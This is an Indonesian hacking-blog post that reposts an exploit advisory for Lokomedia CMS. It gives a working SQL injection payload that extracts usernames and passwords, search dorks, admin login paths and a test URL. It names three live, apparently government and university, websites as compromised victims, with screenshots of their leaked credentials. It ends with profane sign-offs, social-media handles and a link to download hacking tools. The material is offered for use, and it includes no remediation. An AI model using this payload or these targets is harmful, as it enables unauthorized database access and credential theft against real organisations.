[Exploit] Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
###########################
# Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
###########################
![[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWaLOvxs-_Ctxoq9_nZpkCbyKHm3dEO2Mwq7ZxreN-NwGCznD6GOKSwQBfTl0-33AGp9pUytjH8HmirUFyL5A04qCqx6u70tm0hRkyWZ7QcuT_sI_D5Pn6nl-9abEwAXpE_Uc4Qb0Kp7FP/s1600/Background+Desktop+%255B+SYCA+1+%255D.jpg "[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability") |
| [Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability |
=========================================================
[+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
[+] Vendor Homepage :- http://www.bukulokomedia.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Exploit Author :- K33P-S1L3NT
[+] Team name :- Ternate Lab Pentesting
[+] Official Page :- www.facebook.com/loading.gov/
[+] Available :- sql injection cheat sheet | sql injection Remote exploit
[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack
[+] Contact :- aurorakoizora@gmail.com
=========================================================
[+] Severity Level :- Medium
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id,
statis-1-profil.html (string )
statis-3-strukturorganisasi.html (string )
statis-1-visimisi.html (string)
statis-1-tujuan.html (string)
[+] Dork : -
statis-1-profil.html (work100% )
statis-3-strukturorganisasi.html (work100% )
statis-1-visimisi.html (work100%)
statis-1-tujuan.html (work100%)
[+] Local Admin
/redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error
[+] SQL vulnerable File :- /home/user/public_html/XXX.php
[+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html
- http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html
- http://127.0.0.1/statis-1( exploit-code )visimisi.html
- http://127.0.0.1/statis-1( exploit-code )tujuan.html
########################################################
[+] Exploit
/statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
##########################################################
[+] Testing
http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a, (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html
[+] NOTE
username & password open on title-bar or CTRL+U for view username & password this website exploit
###########################################################
[+] LIVE
http://portal.ukit.ac.id ( Title-bar http://i.imgur.com/mYXPvpG.png ) ( CRTL+U http://i.imgur.com/2zKzC5o.png )
http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png )
http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png )
Semoga Bermanfaat :D
Sumber :
Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*
Greetz : ./Maniak_WiFi
\\ Like, Visit, Follow and Share
>> Facebook ** Faris Ghaisan Rabbani >> Twitter ** @JackTersakiti
>> Instagram ** /abdur.rozak.mw >> Youtube ** Pringsewu Cyber Team
// Why So Serious...